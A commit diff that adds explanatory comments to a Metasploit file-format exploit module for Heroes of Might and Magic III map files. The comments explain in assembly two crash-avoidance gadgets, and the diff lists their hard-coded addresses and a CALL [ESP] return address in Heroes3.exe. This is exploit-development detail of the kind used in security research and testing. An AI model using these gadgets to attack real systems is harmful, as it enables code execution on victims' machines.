add documentation

modules/exploits/windows/fileformat/homm3_h3m.rb

@@ -39,7 +39,32 @@ class Metasploit3 < Msf::Exploit::Remote
           [
             'H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
             {
+              # Two "Anticrash"-gadgets are needed or the game will crash before ret
+              #
+              # Anticrash1, needs to pass the following code down to final JMP:
+              # MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
+              # XOR EBX, EBX
+              # CMP EAX, EBX
+              # JE SHORT <crash spot> ; JMP to crash if EAX is 0
+              # MOV CL, BYTE PTR DS : [EAX - 1]
+              # CMP CL, BL
+              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
+              # CMP CL, 0FF
+              # JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
+              # CMP EDI, EBX
+              # JNE <good spot> ; JMP to good spot. Always occurs if we get this far
+              #
+              # Summary: An address which when incremented by 4 and then dereferenced
+              # leads to for example a string which is preceeded neither by a 0x00 or 0xFF
               'Anticrash1' => 0x004497D4,
+              # Anticrash2, needs to return out of the following call (tricky):
+              #
+              # MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
+              # CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
+              #
+              # Summary: An address which when dereferenced leads to an address that
+              # when incremented by 4 and then deferenced leads to a function returning
+              # without accessing any registers/memory that would cause a crash.
               'Anticrash2' => 0x006A6430,
               'Ret' => 0x004EFF87, # CALL [ESP] Heroes3.exe
             }